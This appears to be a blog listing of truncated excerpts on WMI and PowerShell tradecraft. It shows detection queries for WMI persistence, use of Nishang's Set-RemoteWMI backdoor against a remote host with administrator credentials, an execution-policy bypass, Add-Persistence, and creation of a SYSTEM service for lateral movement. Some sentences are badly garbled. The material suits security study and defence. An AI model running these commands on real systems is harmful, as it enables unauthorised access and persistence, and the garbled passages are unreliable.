WMI

WMI for Blue

Detecting Persistence : To detect persistence, common filter, consumer and binding can be manually analyzed or a “detection” permanent event consumer can be created. PS C:\Windows\system32> Get-WmiObject __eventfilter -Namespace root\subscription PS C:\Windows\system32> Get-WmiObject activescripteventconsumer -Namespace root\subscription PS C:\Windows\system32> Get-WmiObject commandlineeventconsumer -Namespace root\subscription PS C:\Windows\system32> Get-WmiObject activescripteventconsumer -Namespace root\subscription Using WMI permanent Event cosnumers to alert […]

WMI

Security Descriptor

This Allow a particular useror group o WMI namesscth sae privilegessa of administrator: PS C:\Users\victim6\Downloads> cd .\new\new\tool\tool\nishang-master\nishang-master\Backdoors\ PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName victim6 –verbose PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator –verbose PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> powershell -ep bypass PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> help set-remotewmi –Examples PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName […]

Powershell * WMI

Lateral Movement Command Execution Win32_service

PS C:\Users\victim6\Downloads> (Get-CimClass -classname win32_service).cimclassmethods Create a service: PS C:\Users\victim6\Downloads> $servicetype = [byte] 16 PS C:\Users\victim6\Downloads> $ErrorControl = [byte] 1 PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_service -name create -argumentlist $false, “Windows performance”,$errorcontrol, $null, $null,”WinPerf”,”C:\Windows\Syetm32\calc.exe”, $null, $servicetype, “Manual”, “NT Authority\system”, ” “ PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_service -filter ‘name = “WinPerf”‘ Start the service: PS C:\Users\victim6\Downloads> Get-WmiObject […]

Powershell * WMI

WMI Events

Extrinsic events: https://github.com/KurtDeGreeff/PlayPowershell PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> . .\Get-WMINamespace.ps1 PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> $namespaces = Get-WMINamespace PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> foreach ($ns in $namespaces) {get-wmiobject -namespace $ns -list | where {$_._SUPERCLASS -eq ‘ ExtrinsicEvent’} PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> Get-WmiObject -class win32_perfFormattedData_PerfOS_System PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master> cd .\Utility\ PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Add-Persistence.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> help Add-Persistence –examples PS C:\Users\victim6\Downloads\new\new\tool\tool> cd .\nishang-master\ PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master> cd .\nishang-master\ PS […]